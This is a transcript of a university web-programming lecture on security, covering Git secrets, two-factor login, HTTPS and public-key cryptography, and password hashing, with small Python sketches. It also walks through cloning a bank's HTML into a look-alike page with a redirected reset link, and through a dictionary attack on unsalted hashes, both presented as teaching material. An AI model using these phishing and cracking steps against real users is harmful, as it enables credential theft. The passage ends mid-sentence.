[MUSIC PLAYING]
BRIAN YU: Welcome back, everyone, to Web
Programming with Python and JavaScript,
and welcome to our final lecture.
So we've talked about a lot over
the course of web programming
with Python and JavaScript.
Everything from version
control to designing
what a web page looks
like using HTML and CSS,
and then moving into programming
languages like Python and JavaScript
that are used on the server side
and on the client side in order
to build and design web applications.
And where I thought
we'd conclude today is
by talking a little bit about
security, about making sure
that our web applications
are secure, thinking
about what sorts of
security vulnerabilities
can come about when we're
thinking about web applications
and deploying them to
the internet, and how
we can best defend against
those potential vulnerabilities.
And in doing so, we'll be taking
a look back at all of the topics
that we've talked about
so far in this course,
going from Git to HTML, to looking
at Flask, SQL, and API design,
thinking about programming in JavaScript,
using Django as a framework later on,
testing with continuous integration
and continuous deployment, in addition
to scalability.
We'll look through all of
these past topics one at a time,
thinking about where
security vulnerabilities might
arise in any of these
areas, and how we might start
to think about defending against them.
Some of these things will
be things we have alluded to
or talked about a little bit over
the course of the semester so far.
But today, we'll really
take an opportunity
to look at all of these
topics in a little more depth
and think about what security
vulnerabilities could come up
in the process of dealing with any
of these areas within a web program.
So where I thought we'd start is at the
very beginning by talking about Git.
So we began the semester by
talking about version control using
Git and GitHub, in particular,
as a way of hosting code
online in a place where different
people from around the world
can have shared access to a repository
of code where they can push code to it.
Or they can pull code from it using
different branches and features
like pull requests in order
to better collaborate on code.
And GitHub is really built upon
this idea of open-source software,
of software where the code
isn't hidden from people,
but is available to potentially anyone
who wants to look at that code,
to see that code, and if they want to,
propose pull requests or suggestions
or changes to that code.
And so let's think about open-source
software just as a high-level idea
right now.
What are some security benefits
of open-source software,
and what are some potential
security concerns that might arise?
Sure.
AUDIENCE: That lots of people
can see it on both sides.
BRIAN YU: Great.
Lots of people can see it--
AUDIENCE: But they'll fix bugs.
BRIAN YU: Right.
And that has implications
on both sides of things
when it comes to bugs, which means that
when you have a lot of different eyes
all looking at the same code, there's
a possibility that someone else might
catch a bug that you missed when
you were writing the software.
But on the flip side
of course, if someone
is able to spot a vulnerability
in your code by reading it
and they don't tell you about it or any
of the other maintainers of the code,
now they're potentially able
to take advantage of a security
exploit in your code, something
you didn't see coming before.
And something that they wouldn't
have otherwise known about
had the code not been open-source.
So open-source software
in that sense can sort of
be a double-edged sword.
With a lot of people
all looking at the code, there's
potential both for a lot of people
to help you find bugs
and make security
improvements to your code,
but also for someone to spot areas
where there might be vulnerabilities.
And over the course of
today, we'll be looking
at some of those potential
vulnerabilities that can exist inside
of our web programs and
taking a look at how we might
start to try to defend against them.
What other security
considerations might come up
when we're using Git and
GitHub, in particular?
If we're hosting our
code online, you might
think that instead of open-source
software, we might be able to just
make our repositories private.
So GitHub has the option of
making repositories private so
that only certain people have
access to your repository.
So not everyone can potentially see it.
But what dangers still
might arise there?
Multiple possibilities.
Sure?
AUDIENCE: Someone had access
to your GitHub account.
BRIAN YU: Sure.
If someone had access
to your GitHub account,
all your code is now stored online.
Which means if some
enterprising hacker is
able to somehow gain
access to your account,
then they might be able
to take advantage of that.
And so for a long time,
most websites have
operated under a model
of username and password
being the way that you
log in to a website.
And increasingly, there are
ways that hackers try and bypass
that, by trying to
either guess passwords,
by guessing frequently used
passwords, or by trying to just guess
many, many different
passwords, trying thousands
or millions of different
password combinations
in the hopes of at least getting
access to some person's account.
And so if hackers are doing that, trying
to guess at passwords very quickly
in order to try and gain
access to accounts, what can
web applications do in order
to defend against that?
In order to defend
against hackers that might
be trying to get into other
users' accounts unauthorized.
Sure?
AUDIENCE: They could do things
like only so many misses.
You can only have so many wrong or
perhaps another kind of authentication,
also.
BRIAN YU: Great.
So different possibilities exist.
One might be placing a
limit on the number of times
you can try to log in
in any period of time.
Maybe you can only log in, or
attempt to log in, five times,
and if you miss five
times, then you have
to wait potentially an hour until you're
able to log in again, for instance.
So many applications do that.
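As a rough sketch of that idea, a server could track recent failed logins per username and refuse further attempts once a limit is hit. This is only an illustration; the limits, function names, and in-memory storage here are all made up, and a real application would persist this state and tune the numbers.

```python
import time
from collections import defaultdict

# Hypothetical policy: at most 5 failed attempts per hour per username.
MAX_ATTEMPTS = 5
WINDOW_SECONDS = 3600

# username -> list of timestamps of failed login attempts
failed_attempts = defaultdict(list)

def login_allowed(username, now=None):
    """Return True if this username may attempt a login right now."""
    now = time.time() if now is None else now
    # Keep only failures that happened inside the current window.
    recent = [t for t in failed_attempts[username] if now - t < WINDOW_SECONDS]
    failed_attempts[username] = recent
    return len(recent) < MAX_ATTEMPTS

def record_failure(username, now=None):
    """Call this after a failed password check."""
    now = time.time() if now is None else now
    failed_attempts[username].append(now)
```

After five failures, `login_allowed` returns False for that username until the hour-long window has passed, which is the "wait an hour until you can try again" behavior described above.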
And then you also talked about
other authentication systems.
So what other authentication
systems could there be?
AUDIENCE: So like the thing where
you get a code pushed to your phone
somehow.
BRIAN YU: Great.
So an increasingly popular
form of authentication
now is two-factor authentication.
The idea that it's not just enough to
log in with a username and password,
but you might also want to log
in with something else, something
that is physically on you,
like a phone for instance.
Where, after you type in
your username and password,
a code is texted to your phone,
or you use an app on your phone
in order to get a special code, and
then you have to type in that code.
So that even if an attacker
potentially knows your password,
either by hacking into some
database and finding the password
or just by guessing it
luckily, they're still
not going to be able to access
your account because they still
have this added step of having to go
through some two-factor authentication
code.
Where they now need to type
in a particular code that
is only available to someone
that physically owns the device,
like a phone.
And that can also help to
improve security as well.
And so GitHub, for instance, has
an opt-in two-factor authentication
where you can enable
that for your account
in order to make your
GitHub account more secure.
And other websites are increasingly
offering two-factor authentication
as well, as just an additional means
of trying to secure your accounts.
And web applications are beginning to
use that as a security measure as well.
But let's think more broadly, not just
about GitHub, but about Git in general,
and this idea of version
control and making changes
and committing and saving those changes.
And when we're thinking about
pushing our commits to the internet,
taking our changes that we've
made in a GitHub repository
and pushing them online,
we want to be careful
that sensitive information
like a password or an access
token for some service doesn't
end up inside of a repository.
Because if it does, then if it gets
pushed online regardless of whether
that repository is public or not, then
there's a potential that other people
might be able to see that access
token when they probably shouldn't.
And so imagine a situation where
you're working on a repository.
And you've made some commits
and maybe accidentally, you
put a password or some
access token that you
didn't mean to inside of one of the
files, and you commit that file.
And so credentials have now been
exposed in one of the commits inside
of your repository.
And then later on down the
line, you realize that mistake.
You realize, oh, wait a minute, I put
credentials inside that repository
when I probably shouldn't have.
And you make another commit removing
those credentials from the file.
So you add another commit,
removing those credentials.
And now those credentials are no
longer in the head of the repository.
You've taken them out, you've
committed that removal.
Is that secure?
No.
I see you shaking heads.
Why not?
AUDIENCE: Because you
can see all the history.
BRIAN YU: Great.
Because of Git's version control,
every time
you make a commit, it's
saving your entire history.
Which means that even though--
if you look at all of your files
in their current state now--
those credentials are not there, anyone
who has access to that repository
has access to the full
history of commits.
They can go back and look at
your previous commit messages,
the previous files you've changed, and
what your files looked like every stage
along the way.
And so once you've exposed
those credentials, now
even if you make another
commit after that,
those credentials are
still going to be there.
And so there are ways around this.
There are ways of reverting back to a
previous commit and pruning away all
the extra commits, and then what we
would call force pushing those commits
back to GitHub in order to update it.
But generally, once you've
pushed code to GitHub,
you might want to imagine all of
that code as potentially compromised.
So if you had passwords
or security credentials
or other keys inside of your
repository that you accidentally
pushed to GitHub, it's probably a good idea
to just revoke those credentials
altogether and
get new ones, because there
is the potential that those
credentials could be compromised once
they're pushed.
And so those are some
security considerations
that might come about when we're
thinking about Git and GitHub.
But let's take a look now to actually
writing code and taking a look at HTML.
So HTML, remember, we were using in
the very beginning of this semester
and all throughout the semester
in order to design web pages.
It just consisted of tags, where
we had our body tags and different tags
for creating lists or forms or
buttons and so on and so forth.
What security vulnerabilities might
come about from just purely HTML?
Or how might HTML be used to
trick users into doing something
that a malicious attacker
might want them to do?
Yeah?
AUDIENCE: In the browser, we can see
the HTML by going to [INAUDIBLE].
BRIAN YU: Great.
Inside of a browser, for instance,
you can inspect a website,
and you can take a look
at all of the code.
And so what are the
implications of that?
Well, that means that if I wanted to, I
could, for instance, go into my browser
and go to, I don't know,
bankofamerica.com for instance.
And I could pull up, OK, here's
Bank of America's website, which
is really just HTML that's
been rendered onto my screen.
And if I wanted to know what code
is Bank of America using in order
to make any of this stuff
happen, I could
control-click on the site,
click on View Page Source,
and what that pulls up for
me is a whole bunch of HTML.
It's a whole bunch of it, and I don't
really know what all of it does.
But if I just take it all
and copy it to my clipboard,
and I go into a text editor
and create a new file--
I'll call it bank.html--
and I'm just going to
paste in all of that code
that I just copied off
Bank of America's website.
I didn't have to write any of it,
just copied it straight from there.
Now if I go ahead and open
bank.html, this file I just created,
now I've effectively recreated
Bank of America's website
just by copying their HTML.
And if I now host this from my
own web server, for instance,
I might be able to trick unsuspecting
users into thinking that this
is actually Bank of America's website.
Because just at first glance, it looks
quite reasonably like the same thing
because it's the exact same HTML.
And if I'm really
enterprising, I can think
about actually trying to make
modifications to this code
in order to even better be able to
try and maliciously take advantage
of a user who might unsuspectingly
be arriving at this site,
not realizing that it's not the
actual Bank of America website.
I might, for instance, take
this Forgot Passcode button
down here-- which is
probably a link to some page
where they might type in their
email address or try and type
in some new passcode that
they want for instance--
and I might just take this
HTML file, and I'll just
search for forgot passcode.
And OK, here it is.
Here's forgot passcode.
And if we notice, it's located
inside of an a tag-- an anchor tag--
which has this href
attribute, which is going
to be where the user is linked
to if they were to ever click on
that I forgot my password button.
And so if I take this link, this
secure.bankofamerica.com/login
something, and instead of linking
to that, link to, I don't know,
https://cs50.github.io/web or whatever
other page I want to redirect the user
to.
Now if I refresh the site, it looks like
Bank of America's website once again,
but when they go over here and they
try and click on this Forgot Passcode
button, now they're taken to
our website or whatever website
I want to take the user to.
I can modify the HTML that they have
in order to direct them anywhere.
And so that's sort of
one of the common ways
that attackers are able to use
HTML to try and trick users
into doing something.
In particular, noting the
fact that you can take a link
and make it look like it's
going anywhere, but really
take the user to
somewhere that you want.
I can have something like this, where
I just have a href equals url1
and url2 as the link text, where
url1 is where the user will actually
be taken and url2 is just the text
that appears to the user.
Then the user might
reasonably be tricked
into thinking that they're going to url2
when in reality, they're going to url1.
And so a simple example of that
might be inside of link.html here.
We're in link.html.
It's a very simple HTML website,
where inside of my body tag,
I have an anchor tag, which
is just going to be a link.
And the href of that link is this
course's website, for instance.
But in between the a tags, what I
have is just google.com, for instance.
And so what that means is that
if I were to open up link.html,
for instance, what the user
sees is something like this,
a page that just has a link to Google.
And they might reasonably think
that clicking on that link
should take them to Google when in
fact, when they click on that link,
they're taken here instead,
to the course web page.
And so you can imagine
how this might actually
be able to be used in order
to create potential exploits.
So if I were to
take Bank of America's URL,
go to link.html and say, all
right, we'll put Bank of America here,
and in the href, instead
put bank.html, for instance,
which is the link to the file that I
created copying Bank of America's code.
Now suddenly, when I
open up link.html, I
get a link that looks like it
is linking to Bank of America.
I click on that link,
and I get a page that
looks like Bank of America's website.
And if I click on forgot my passcode,
now I'm redirected to some other site
altogether.
And so these are common
ways that exploits
are able to happen by taking
advantage of security vulnerabilities
like this where we're really just
relying on people not being aware
of the fact that clicking
on a link might take them
to somewhere else different altogether.
And so how do you defend
against things like this?
Well, one good strategy
from the user end
is just to be careful about
the links that you're clicking.
In Chrome, for instance, if you hover
over a link, down in the lower left,
you can see this--
it's in small text, so you
might not be able to see it,
but this is the actual URL that
the link is going to take you to.
So you can't always
trust what the text is.
You might want to look very carefully at
where that link is actually taking you.
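That kind of check can even be automated. Here's a small sketch, using only Python's standard-library HTML parser, of a heuristic that flags anchor tags whose visible text looks like a URL but doesn't match the href they actually point to. The class name and the heuristic are my own inventions for illustration, not anything a browser provides.

```python
from html.parser import HTMLParser

class MisleadingLinkDetector(HTMLParser):
    """Flag <a> tags whose visible text looks like a URL
    but doesn't match where the href actually points."""

    def __init__(self):
        super().__init__()
        self.current_href = None
        self.text = ""
        self.suspicious = []  # (visible_text, actual_href) pairs

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.current_href = dict(attrs).get("href", "")
            self.text = ""

    def handle_data(self, data):
        if self.current_href is not None:
            self.text += data

    def handle_endtag(self, tag):
        if tag == "a" and self.current_href is not None:
            text = self.text.strip()
            # Crude heuristic: the visible text itself looks like a URL.
            looks_like_url = text.startswith("http") or "." in text
            if looks_like_url and text not in self.current_href:
                self.suspicious.append((text, self.current_href))
            self.current_href = None

detector = MisleadingLinkDetector()
detector.feed('<a href="bank.html">https://www.bankofamerica.com</a>')
print(detector.suspicious)  # [('https://www.bankofamerica.com', 'bank.html')]
```

The deceptive link from the demo above gets flagged because the text claims one destination while the href points somewhere else entirely.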
And so these are just some examples
of HTML being used in order
to create potential security exploits.
Questions about any of that so far?
Yeah?
AUDIENCE: So why does our
browser allow us to see a source
code in the first place?
BRIAN YU: Great question.
Why do web browsers allow us to see
the source code in the first place?
Well, in a sense, the web browser,
what it's getting is the source code.
So when a web browser is making
a request to bankofamerica.com,
for instance, bankofamerica.com needs
to give back information to my computer.
And that information needs
to be the code, the HTML,
that is going to render the page.
So hypothetically, a browser might
just not make that source code
easily accessible.
But anyone who wants to, if
you're really enterprising,
could just look at the information
that's coming back from the server.
That information will contain the
source code one way or another.
So there's really no way to hide it.
Good question, though.
All right.
So that was HTML being used in
order to create potential security
vulnerabilities or security exploits.
Let's take a look now, by moving on
one week, and talking about Flask.
So we talked about moving on from
just creating static web pages that
are displaying HTML content to using a
web server, where we're communicating
between the server and the user,
sending packets of information
along the internet.
And as soon as we start dealing
with that, packets of information
going from one server to a
client, traveling between routers,
now we start to deal with other
security concerns as well.
So here, we'll start to talk about
HTTP, Hypertext Transfer Protocol, which
is typically used to send packets
of information across the internet,
as well as HTTPS, which is a more
secure version of that, which
we'll take a look at in just a moment.
So let's imagine this diagram.
I have one computer
here, maybe it's a server
running some Flask web application.
And I have a client over
here, which is maybe asking
for information from that web server.
In other words, I've
got two computers that
need to communicate with each
other over the internet somehow.
And maybe they've never
communicated with each other before,
so they need to talk
to each other somehow.
And so this computer might want
to send packets of information
to the other computer.
But of course, that information doesn't
go to the other computer directly.
It needs to travel over
the internet, traveling
between different routers and
different servers for instance,
before it gets from point
A to point B. And likewise,
when information wants to come
back from that computer over there
to this computer, we also
need to have information
that is traveling through the
internet that's potentially going
to all of these routers in between.
And so just looking at
this diagram, what's
a security vulnerability that seems
clear just from a basic perspective?
Yeah?
AUDIENCE: Changing HTTP header could--
BRIAN YU: Great.
So changing HTTP headers.
That's an interesting thought, that if
this request is getting passed from--
a request goes from this computer
through all these routers
into this computer, potentially,
one of the servers in the middle,
one of these routers, might be able
to change that request, for instance,
in order to try and make a request
that's slightly different than what
the original user wanted.
Or likewise, because any of
these intermediary routers
have access to the full contents
of whatever request is being passed
or response is being passed back and
forth between these two computers,
anyone in the middle of this process
could potentially take that information
and have access to it.
They could read an
email that's being sent
or the contents of a web page response
that's being sent from one computer
to the other because that
packet of information
is just traveling over the internet.
So how do we solve that problem?
Yeah?
AUDIENCE: Encrypt traffic.
BRIAN YU: Encrypt traffic.
Great.
Cryptography is this idea of encrypting
information, making sure
that it's not
the plain text of the
request or the response
that's getting sent over the
internet, but rather some ciphertext,
some encrypted version of that plain
text, such that someone in the middle
can't just immediately read it.
And there are all sorts of
different cryptography algorithms.
And we'll talk high level about
a couple of the ideas that
go behind cryptography.
And so one form of cryptography
you might hear about
is secret key cryptography,
where the idea there
is that we have a secret key
that only I know and only
the person at the other computer that
I want to communicate with knows.
And that key can be used with
my cryptographic algorithm
to encrypt my plain text.
I take my plain text and use my secret
key to encrypt it into ciphertext.
Or likewise, I can use the
key to decrypt information.
If I have ciphertext, something
that's already been encrypted,
I can use that key along
with the ciphertext
in order to generate plain text.
And so you might imagine a diagram
where I have one computer over here
and I'm trying to communicate
with a computer down there.
I have this secret key, this ability
to encrypt and decrypt information,
and I also have the plain text
of what it is that I actually
want to encrypt, the message that I want
to send from one place to the other.
And so what might reasonably happen?
What I do in secret key
cryptography is first
use the key to encrypt
the plain text, generating
some ciphertext, some encrypted
version of the plain text
that someone without the key
wouldn't be able to understand.
So then I would need to transfer
the ciphertext to this computer.
And if this computer has both the
ciphertext and a copy of that same
secret key, then they can use that key
in order to decrypt that ciphertext
and regenerate the plain text-- find
out what it is that I actually intended
to happen--
such that now, the plain text was
never transferred from one computer
to the other.
I was only ever
transferring the ciphertext
from one computer to the other.
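As a toy illustration of that flow, and only a toy: XOR with a repeating key is trivially breakable, and real systems use vetted ciphers like AES. What it does show is the shape of the scheme, where one shared key both encrypts and decrypts.

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt by XORing each byte with the repeating key.
    XOR is its own inverse, so the same function does both directions."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

secret_key = b"shared-secret"           # both parties must already have this
plaintext = b"transfer $100 to bob"

ciphertext = xor_cipher(plaintext, secret_key)   # computer A encrypts
recovered = xor_cipher(ciphertext, secret_key)   # computer B decrypts

assert recovered == plaintext
assert ciphertext != plaintext           # what travels isn't readable as-is
```

Only the ciphertext ever crosses the network; the catch, as just discussed, is that `secret_key` somehow has to reach the other side too.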
Does anyone see a problem
with what we just did there?
It seems like no plain
text is ever transferred.
What could go wrong?
Yeah?
AUDIENCE: How do you send the key?
BRIAN YU: Great.
How do you send the key?
That somehow, I need to have
this key and the person over here
also needs to have that key.
And if I'm just sending the key
over the internet from one computer
to the other, which
I would theoretically
need to do because otherwise
I have no way of communicating
with the other computer, then we've
just created the same problem again.
That any of these routers,
these intermediary pieces,
over the course of this communication
from computer A to computer B,
could just intercept the key
and intercept the ciphertext.
And now they have all the
pieces they need in order
to regenerate the plain text.
So this secret key
cryptography works if and only
if I and the other person are
the only ones with access to the key.
And it doesn't work so well
if this key is something
that needs to be transferred
plainly over the network in order
to get to the other person, because then
anyone could just intercept that key.
And so how do we solve that problem?
Well, one solution
people have come up with
is this idea of public key cryptography.
And this is very common,
and it's what HTTPS
uses in order to securely transfer
information over the internet.
And the idea there is instead of
having just one key, we have two keys.
We have a public key and a private key.
And these are related in a
particularly important way,
and the details have to do
with a lot of mathematics.
But the general idea is that
the public key is something
that you should be able
to share with anyone,
and the public key can only be
used to encrypt information.
It will take plain
text and it'll generate
the ciphertext, the encrypted version.
But it doesn't go in
the other direction.
It can only be used to encrypt data.
And likewise, the
private key is something
that you should only
ever keep to yourself.
You should never share your
private key with anyone else.
And the private key can
be used to decrypt data.
That if I have encrypted
information that
was encrypted using the public
key, I can use the private key
in order to decrypt it.
So what does that model
look like if I now
have two computers that want
to communicate with each other?
I still have this
computer over here that
wants to send this plain
text over to this computer,
but wants to do so securely.
So the first thing that's
going to need to happen
is that this computer,
computer B down here,
gives its public key to
computer A. And that's
OK because the public key is something
that can be shared with anyone.
Anyone's allowed to see it
because the public key can only
be used to encrypt data.
It can't be used to decrypt data.
And so now computer A, having access
to the plain text and the public key,
now has the ability to encrypt the
plain text, generating the ciphertext.
That ciphertext then gets transferred
down to the other computer.
And now computer B has both the
ciphertext, this encrypted information
that nobody along this path
was able to read or see,
and also has access to this private
key that only they had access to.
And that is the only thing that can be
used in order to take the ciphertext
and decrypt it and figure out what
it is that the message actually is.
And now computer B has the ability
to regenerate the plain text from it.
And so now we've been able to come up
with a secure way of allowing computer
A and computer B to
communicate with each other,
just by allowing them to use this
public and private key pairing such
that the public key is used
to encrypt the information
and is shared with everyone,
and the private key is only
used for decrypting the information.
And it doesn't matter if
the intermediaries have
the public key because that
just means other people might
be able to encrypt the
data, but not necessarily be
able to decrypt that information.
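To make those shapes concrete, here is a toy, textbook-RSA sketch in Python (3.8+, for the modular-inverse form of `pow`). The primes are tiny and there is no padding, so this is nothing like a secure implementation; it only demonstrates that anyone holding the public key can encrypt, while only the private-key holder can decrypt.

```python
# Toy textbook RSA. Real deployments use keys thousands of bits long,
# randomized padding, and audited libraries; never roll your own.

p, q = 61, 53                 # two (tiny) primes, kept secret by computer B
n = p * q                     # modulus, part of both keys
phi = (p - 1) * (q - 1)
e = 17                        # public exponent, coprime with phi
d = pow(e, -1, phi)           # private exponent: modular inverse of e

public_key = (e, n)           # safe to hand to anyone, including routers
private_key = (d, n)          # never leaves computer B

def encrypt(m, key):
    """Anyone with the public key can run this."""
    e, n = key
    return pow(m, e, n)

def decrypt(c, key):
    """Only the private-key holder can run this meaningfully."""
    d, n = key
    return pow(c, d, n)

message = 42                  # a message encoded as a number smaller than n
ciphertext = encrypt(message, public_key)
assert decrypt(ciphertext, private_key) == message
assert ciphertext != message
```

Computer B publishes `public_key`, computer A encrypts with it, and intercepting both the ciphertext and the public key gains an eavesdropper nothing, since decryption requires `d`.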
Questions about that or any problems
that we see with that model?
OK.
In that case, we'll go
ahead and move on to talking
about our next subject, which is
going to be environment variables.
And so environment
variables are something
we've seen a little bit of in Flask
before, and probably in Django as well.
But we'll talk about it
in the context of trying
to make our applications more secure.
So we talked about,
in the context of Git
earlier, that we rarely,
or probably never,
want to put passwords or other
secure, confidential information
inside of our source code.
Because as soon as we push a password or
an access token to a GitHub repository,
now suddenly anyone who has
had access to that repository
could theoretically be able to see it.
Or if someone gets access to your
GitHub account by some means or another,
they would also be able to see
that password or access token.
Maybe that's going to be an access token
that is the access token for getting
access to your database, for instance.
Or it's your access
token for whatever cloud
provider you're using,
like Amazon Web Services,
in order to deploy your
application to the internet.
So rather than doing something
like this, where if you've used
Flask before and have used
their cookie-based sessions,
you need to set a secret key
inside of your application
where you might have
set a secret key to just
be some random string of characters,
which is totally fine for just running
the application.
This isn't all that
secure because as soon
as you push this file to
the internet, now anyone
who has access to your
repository theoretically
has access to your secret key as well.
And so this is often where
we would want to use environment
variables: variables that are
located just inside of the system
on the computer where your program
is running, such that we can replace
the key with
os.environ.get("SECRET_KEY").
In other words, get the environment
variable called secret key
and use it as a secret key
so that inside your code, now
it just says this.
So nobody who reads your code knows what
the secret key for your application is,
but only the computer on which this
program is running that, theoretically,
has that secret key set as one
of its environment variables
will then be able to use it.
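A minimal sketch of that pattern might look like this. The function name and the fail-loudly error handling are my own choices, not part of Flask; the only real API here is `os.environ`.

```python
import os

def load_secret_key(env=os.environ):
    """Fetch the app's secret key from the environment, failing
    loudly if it was never set, rather than silently running
    without one."""
    key = env.get("SECRET_KEY")
    if key is None:
        raise RuntimeError("SECRET_KEY environment variable is not set")
    return key

# The value is set outside the source tree, e.g. in the shell:
#   export SECRET_KEY='some-long-random-string'
# and then, in a Flask app, something like:
#   app.config["SECRET_KEY"] = load_secret_key()
```

The secret never appears in the repository; each machine that runs the app supplies its own value through the environment.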
And so environment
variables in that sense
can be a very valuable
tool when it comes
to trying to make sure that
we're not exposing information
that we didn't want to expose when
we were creating our application.
Questions about environment variables?
All right.
So that was Flask.
And let's go ahead now and
move on to talking about SQL.
So we talked a lot
about databases and how
we might go about designing databases.
And in a couple of our
projects now, we've
had to create a table that is able
to manage a database of users, where
users are able to log in and log out.
And in order to do that, we needed some
sort of database structure in place
so that users could be
remembered by our system,
so that they could log in,
and so that they had passwords.
And you might imagine that a users
table might have looked something
like this, where each user has
an ID, each user has a username,
each user has a password.
What are potential design problems
or security vulnerabilities
with a table that's designed like this?
Yep?
AUDIENCE: If someone gets
their hands on the database,
they can see all the passwords.
BRIAN YU: Yeah.
So obviously, we want to
keep our tables secure.
We don't want to let just anyone
have access to our database.
But if by some chance, someone
got access to our database,
either because they managed to
figure out what the password is
or they got access to it
in some other way, now
suddenly they have access to all
of the different passwords that
are inside of this database.
They know what everyone's
password is, and now
that's a major security vulnerability.
Especially if some of these users
might be using these same passwords
not only on one website, but on
many other different websites.
Now their password could be compromised
across a number of different websites
as well.
And so what might be a solution here to
avoiding needing to store the password
inside of the table?
And this might be something
that you've already
done in some of your existing projects.
AUDIENCE: Encrypt the passwords.
BRIAN YU: Yeah.
Encrypt the password.
In other words, don't just store
the plain text of the password,
store some version of the password.
And in particular, we'll
generally store what we
call a hashed version of the password.
Where a hash function is just going to
be some function inside of your code
that takes text like a
password and generates,
deterministically, some long, seemingly
random sequence of characters
that is associated with that text.
And so every time you put hello
in as the password and hash it,
you'll always deterministically
get the same output.
And so then your users table
might look something like this.
Where you've got all of your
users, but in your password column,
instead of storing the actual
password in plain text,
you're storing some hashed
version of that password.
Such that hello generates
this text as the password
instead of just storing hello.
So now if someone gets
access to this database,
they're still not going to be able
to log into Anushree's account,
for instance, if they go to
the website because they're not
going to know what password corresponded
with this long sequence of characters.
And generally, hash functions are
designed to be one-way functions.
That you can go from the plain text,
the password, to this hashed version.
But it's very, very computationally
difficult to go backwards,
to go from this hashed version
to what the password originally
was in order to generate this.
And so what are the security
implications of this model?
How do we log in a user now, in this model?
If someone were to log
into a website, what logic
would need to happen if
we're no longer storing
passwords but storing hashed passwords?
Yeah?
AUDIENCE: They could
take the password they
enter, you run through
your hash algorithm,
and you see if it matches
what's in your file.
BRIAN YU: Wonderful.
User logs in with their
user and password.
You take that password and
you hash it, and you check
to make sure that the hash matches up.
And because our hash
function is deterministic,
the same input will produce the
same output every single time.
If they did input the correct
password, then the hashes
should theoretically line up.
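That hash-and-compare login check can be sketched with Python's standard library alone. This is illustrative, not the lecture's actual code: the function names are made up, and PBKDF2 with a per-user salt stands in for whatever hash scheme a real application would pick.

```python
# A minimal sketch of hash-and-compare login logic using Python's standard
# library. Function names and the storage layout here are illustrative.
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Return (salt, digest) for a password using PBKDF2, a slow, salted hash."""
    if salt is None:
        salt = os.urandom(16)  # a fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, stored_digest):
    """Re-hash the submitted password with the stored salt and compare."""
    _, digest = hash_password(password, salt)
    # hmac.compare_digest avoids timing side channels in the comparison.
    return hmac.compare_digest(digest, stored_digest)

# Store only the salt and digest in the users table, never the plain text.
salt, stored = hash_password("hello")
print(verify_password("hello", salt, stored))    # correct password -> True
print(verify_password("goodbye", salt, stored))  # wrong password -> False
```

Because the hash is deterministic for a given salt, the correct password reproduces the stored digest; anything else does not.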
Have you ever used a
website before where,
when you forget a
password, your password,
and you might want the
website to just tell you
what your password is, but
the website says, sorry,
we can't tell you what your password is,
but we can let you reset your password.
With this in mind, why
might that be the case?
Why can a website sometimes
not tell you what your password
is but still allow you to reset it?
Or still be able to log you
in if you knew your password?
AUDIENCE: Because they're not
storing it in text anymore.
So we don't know--
BRIAN YU: Great, exactly.
It's because of this idea of
the one-way hash function.
That if you take the password, you
can generate this hashed version.
But it's very difficult to
go the other way around.
Such that, if this is what I have access
to in my database, I can look at this,
and I don't actually know what
Anushree's or Elle's password
originally was.
But if you give me their password, then
I can hash it and compare it for you
and maybe be able to tell
you that as a result.
But I could reset it if I
wanted to just by replacing
this field with some new hashed value.
That would be something that
I could do, but I might not
be able to actually tell
you what that password is.
Of course, if these passwords
are common, like these are--
if they're just passwords
hello or password or 12345--
then how might I still be able
to figure out a user's password
even if the database looks like this?
Yeah?
AUDIENCE: You hash it and
compare the hashes or if you
can look for common hashes and see.
BRIAN YU: Exactly.
If you know what the hash function
is, then someone trying to--
a malicious user trying
to exploit the system
might be able to just try a whole
bunch of different common passwords,
figure out what their
hashed versions are,
and then compare it to the versions
that are here in order to figure out
what the password might be.
So even this is not 100% foolproof.
Someone who is trying a
bunch of common passwords
might still be able to
figure out what it is
that's going on inside of this system.
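That dictionary attack can be sketched in a few lines. The leaked table and password list here are hypothetical, and unsalted SHA-256 stands in for the hash function purely for illustration:

```python
# A sketch of the dictionary attack just described: if the attacker knows the
# hash function, they can hash common passwords and compare against a leaked
# table. Unsalted SHA-256 and the data below are purely illustrative.
import hashlib

def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()

# A hypothetical leaked users table of unsalted password hashes.
leaked = {"alice": sha256_hex("hello"), "bob": sha256_hex("12345")}

# Precompute hashes of common passwords, then look each leaked hash up.
common_passwords = ["password", "12345", "hello", "qwerty"]
lookup = {sha256_hex(p): p for p in common_passwords}

for user, digest in leaked.items():
    if digest in lookup:
        print(user, "uses the common password:", lookup[digest])
```

Note that a per-user random salt, as in the earlier hashing sketch, defeats exactly this kind of precomputed lookup, since the same password no longer hashes to the same stored value for every user.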
And so that's certainly
one vulnerability
that could come up when we
think about database design.
But another vulnerability,
and this is one
we talked about a little
bit a couple of weeks ago,
but we'll dive into in a
little more depth now--
well, actually, first,
before we get there, sorry.
So this was that Forgot
Your Password screen
that we were talking a little
bit about before, where
oftentimes what might happen is you'll
type in an email address, for instance,
and you'll click Reset Your Password.
And that will send you
an email that gives you
the ability to reset your password.
So another possible way our
databases could be insecure,
another way we might have
vulnerabilities in our database,
is thinking about what information
might be leaked by our database.
What information can get out
when we don't want it to get out?
And can anyone see a
potential vulnerability here,
in terms of information leakage?
Information that might be exposed
that we might otherwise not want
exposed, just from a user interface
like this that people can use?
AUDIENCE: Your email address might be
exposed as it's going over the web.
BRIAN YU: Great.
So your email address
is potentially exposed
as it's traveling from
one point to another.
Although, with HTTPS and trying
to encrypt that information,
usually we can help to
defend against that.
But certainly the idea of
typing in an email address
and clicking on reset password leads
to potential information leakage
in other ways.
Whereby if I type in an
email address of my account
that I've perhaps
forgotten my password to,
or a friend's account that I think
they've forgotten their password to,
potentially, and I click
Reset Password, then
I might see a notification that
very recently might just say,
password reset email sent.
What if I typed in the
email address of someone who
didn't have an account on the website?
What might you expect
this website to do?
Yeah?
AUDIENCE: Give you an error message.
BRIAN YU: Should give you
an error of some sort.
Something like, error, there is no
such user with that email address.
And now that we've seen those two
screens, you type in an email address
and sometimes you get password reset
email sent and sometimes you get error,
there is no user with
that email address.
Where is the potential
information leakage here?
Yeah?
AUDIENCE: It could figure
out who the users are
by trying out different emails.
BRIAN YU: Great.
Now, by using this screen, even if
I don't know people's passwords,
I can figure out who has an account with
this website and who doesn't, right?
If it's a bank, for instance, and
I type in someone's email address
and I get this screen,
password reset email sent,
